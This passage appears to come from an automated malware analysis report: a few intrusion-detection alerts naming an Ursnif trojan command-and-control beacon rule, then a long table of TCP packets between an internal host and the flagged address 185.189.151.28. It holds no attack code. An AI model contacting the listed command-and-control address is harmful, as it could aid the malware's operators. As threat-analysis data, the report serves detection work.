|---|---|---|---|---|---|---|---|
| 05/04/22-12:42:53.250349 05/04/22-12:42:53.250349 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| 05/04/22-12:42:52.800201 05/04/22-12:42:52.800201 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| 05/04/22-12:42:53.707282 05/04/22-12:42:53.707282 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| 05/04/22-12:42:32.722808 05/04/22-12:42:32.722808 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49770 | 80 | 192.168.2.3 | 13.107.43.16 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| May 4, 2022 12:42:52.778404951 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:52.795990944 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:52.796118021 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:52.800200939 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:52.817224026 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.086601019 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.086652040 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.086745024 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.086765051 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.086776018 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.086808920 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.086848021 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.086884975 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.086894035 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.086903095 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.086955070 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.087028980 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.087039948 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.087073088 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.087110996 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.087122917 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.087166071 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.087187052 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.087202072 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.087233067 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.087249994 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.087282896 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.087312937 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.087349892 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.104511023 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104574919 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104604959 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104640961 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.104671955 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.104679108 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104737043 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104746103 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.104783058 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104793072 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.104854107 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104896069 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104912043 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.104923010 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104960918 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.104964972 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.104999065 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105021954 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105026960 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105056047 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105179071 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105247021 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105259895 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105287075 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105329990 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105350018 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105407953 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105428934 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105443001 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105484962 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105678082 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105736017 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105742931 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105763912 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105798006 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105834961 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105854034 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105881929 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.105894089 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.105912924 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.106039047 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.106086016 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.106101036 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.106125116 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.106144905 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.106185913 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.106228113 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.106247902 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.106254101 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.106285095 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122225046 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122272015 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122301102 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122339964 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122375011 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122405052 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122411966 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122534037 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122548103 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122561932 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122601032 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122623920 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122648001 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122684956 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122731924 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122745037 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122797966 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122834921 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122858047 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122858047 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122885942 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122921944 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.122924089 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122965097 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.122983932 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123006105 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123022079 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123049021 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123066902 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123090029 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123126984 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123151064 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123183966 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123184919 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123234034 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123248100 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123341084 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123380899 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123409033 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123423100 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123442888 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123449087 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123481035 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123594046 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123636007 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123652935 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123682976 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123693943 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123738050 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123738050 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123811960 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123853922 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123871088 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123891115 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123912096 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123919010 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123954058 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.123958111 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.123997927 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124016047 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124037981 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124054909 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124063969 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124094963 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124103069 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124155998 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124209881 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124249935 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124269009 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124305964 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124309063 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124337912 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124366045 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124376059 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124416113 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124428988 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124455929 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124470949 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124516010 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124525070 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124556065 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124583960 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124596119 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124634027 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124655008 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124675989 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124691963 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124725103 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124736071 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124741077 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124759912 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.124783993 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.124819994 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.141776085 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.141861916 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.141865969 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.141936064 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.141940117 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.141992092 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142034054 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142049074 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.142071962 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142091036 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.142113924 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142128944 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.142143011 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142170906 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.142180920 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142220020 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142236948 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.142260075 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142276049 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.142298937 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142318964 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.142328024 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.142358065 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143045902 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143088102 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143129110 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143143892 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143150091 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143188953 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143199921 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143229961 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143258095 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143290997 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143347979 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143465042 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143532991 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143539906 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143579960 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143596888 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143639088 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143635988 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143707991 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143767118 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143826962 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143877983 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143935919 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.143953085 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.143980980 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144010067 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144018888 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144072056 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144077063 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144138098 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144217968 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144256115 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144277096 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144294977 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144309998 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144334078 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144359112 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144392967 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144397974 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144458055 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144543886 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144572973 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144609928 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144617081 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144651890 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144670963 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144692898 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144711018 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144731045 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144752026 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144771099 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144789934 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144831896 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144835949 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144893885 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.144902945 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.144952059 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145005941 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145032883 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145061016 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145071983 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145117044 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145128965 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145167112 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145174980 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145205975 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145225048 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145247936 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145262957 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145287037 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145303965 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145327091 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145345926 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145366907 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145382881 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145395041 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.145431995 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.145433903 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
